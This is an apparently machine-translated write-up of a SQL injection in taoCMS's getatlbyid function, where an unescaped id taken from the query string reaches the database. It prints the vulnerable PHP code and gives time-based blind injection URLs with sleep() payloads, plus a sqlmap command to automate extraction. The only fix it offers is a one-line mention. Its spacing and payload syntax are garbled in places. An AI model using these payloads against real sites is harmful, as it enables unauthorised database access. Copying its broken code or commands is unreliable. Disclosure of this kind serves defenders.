It is embarrassing to guess that the blind injection failed because memcache was used on the official website... Taocms SQL injection can ignore GPC: the cause of the vulnerability above the http://www.bkjia.com/Article/201406/309080.html is: $ path variable from $ _ SERVER ['query _ string'], therefore, the variables are not protected by GPC (although GPC has been removed from PHP in a later version ). Therefore, the author's solution is: $ path = Base: safeword ($ path), which is escaped using addslashes as single quotes. So find a digital type and continue to inject it. The Architecture Design of taoCMS is quite strange. You can call the public method in the Index class. Access http: // url/index. php /? Path & action = getatlbyid is called.
Index::getatlbyid(‘?path&action=getatlbid’);static public function getatlbyid($id){if(!$id)return null;self::$_db=new Dbclass(SYS_ROOT.DB_NAME);if(MEMCACHE){self::$_mem=new Memcached(MEMCACHE);if(!$atl=self::$_mem->get($id.'_cms')){$atl=self::$_db->get_one(TB."cms",'status=1 and id='.$id,"*",1);;self::$_mem->set($id.'_cms',$atl);}}else{$atl=self::$_db->get_one(TB."cms",'status=1 and id='.$id,"*",1);}return $atl;}
We can see that $ id is included in the SQL query without any processing, resulting in injection. Here we introduce? As a result, there is no way to close it. Fortunately, $ _ SERVER ['query _ string'] is used to obtain the QUERY parameters? Move it to the back to avoid it. The access method is http: // url/index. php/payload % 23? Action = getatlbyid: This function does not output any results... No echo is reported, so you can only use blind injection. Http: // demo/tao/index. php/if (ascii (substr (user (), 113)>, sleep (4), 26) % 23? Action = getatlbyid delay http: // demo/tao/index. php/if (ascii (substr (user (), 114)>, sleep (4), 26) % 23? Action = getatlbyid normal first letter is char (114) = r. Manual blind injection is too troublesome. Write a transit script and run it with sqlmap. ./Sqlmap. py-u http: // demo/tao. php? Sqli = 26 -- technique T -- dbms MySQL -- prefix "" -- suffix ""-D taocms -- tables
static public function getatlbyid($id){if(!$id)return null;self::$_db=new Dbclass(SYS_ROOT.DB_NAME);if(MEMCACHE){self::$_mem=new Memcached(MEMCACHE);if(!$atl=self::$_mem->get($id.'_cms')){$atl=self::$_db->get_one(TB."cms",'status=1 and id='.$id,"*",1);;self::$_mem->set($id.'_cms',$atl);}}else{$atl=self::$_db->get_one(TB."cms",'status=1 and id='.$id,"*",1);}return $atl;}
$ Id is not processed and imported into SQL query, resulting in injection. Solution:Sqli anti-Injection
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
